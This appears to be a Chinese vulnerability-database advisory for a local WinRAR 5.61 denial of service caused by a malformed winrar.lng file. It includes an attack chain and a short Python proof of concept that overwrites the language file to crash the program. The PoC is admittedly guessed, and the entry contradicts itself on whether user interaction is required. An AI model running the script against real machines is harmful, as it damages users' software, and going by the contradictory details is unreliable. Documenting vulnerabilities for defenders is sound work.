CVE-2019-25677 CVSS 6.2 中危

CVE-2019-25677 WinRAR拒绝服务漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25677

漏洞类型

拒绝服务

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WinRAR

漏洞概述

WinRAR 5.61版本存在一个拒绝服务漏洞。本地攻击者可以通过在WinRAR安装目录中放置恶意的winrar.lng语言文件来触发该漏洞。当用户打开压缩文件并点击“测试”按钮时，WinRAR会尝试读取该畸形文件，导致访问冲突，进而引发应用程序崩溃。该漏洞攻击复杂度低，无需用户交互即可利用，严重影响软件的可用性。

技术细节

该漏洞的根源在于WinRAR在处理语言文件（winrar.lng）时缺乏足够的边界检查或错误处理机制。攻击者需要拥有对WinRAR安装目录的写入权限（本地攻击），将构造好的畸形数据写入winrar.lng文件。该文件用于存储软件的界面语言字符串。当WinRAR启动或执行特定操作（如测试压缩包）时，会加载并解析该语言文件。由于解析逻辑存在缺陷，当遇到异常数据时，程序尝试访问无效的内存地址（示例中为0x004F1DB8），导致访问违规。攻击成功后，会导致WinRAR进程终止，造成拒绝服务，但不会影响系统的机密性或完整性。

攻击链分析

STEP 1

步骤1

攻击者获取对目标系统WinRAR安装目录的写入权限。

STEP 2

步骤2

攻击者在安装目录中创建或替换原有的winrar.lng文件为包含畸形数据的恶意文件。

STEP 3

步骤3

受害者或系统触发WinRAR加载语言文件的操作（如打开压缩包并点击测试按钮）。

STEP 4

步骤4

WinRAR解析畸形文件时发生内存访问冲突，导致应用程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# Path to WinRAR installation directory (User needs to modify this)
# The vulnerability is triggered by replacing the language file with malformed data.
target_path = "C:\\Program Files\\WinRAR\\winrar.lng"

# Create malformed data (e.g., random bytes or specific pattern causing access violation)
# Based on the description, corrupting the file structure triggers the crash.
malformed_data = b"\x41" * 0x1000  # Example pattern (Buffer of 'A's)

try:
    with open(target_path, "wb") as f:
        f.write(malformed_data)
    print("[+] Malformed winrar.lng file created successfully.")
    print("[*] Open an archive and press 'Test' or trigger the language load to trigger the DoS.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

WinRAR 5.61

防御指南

临时缓解措施

限制对WinRAR安装目录的写入权限，防止未经授权的修改winrar.lng文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表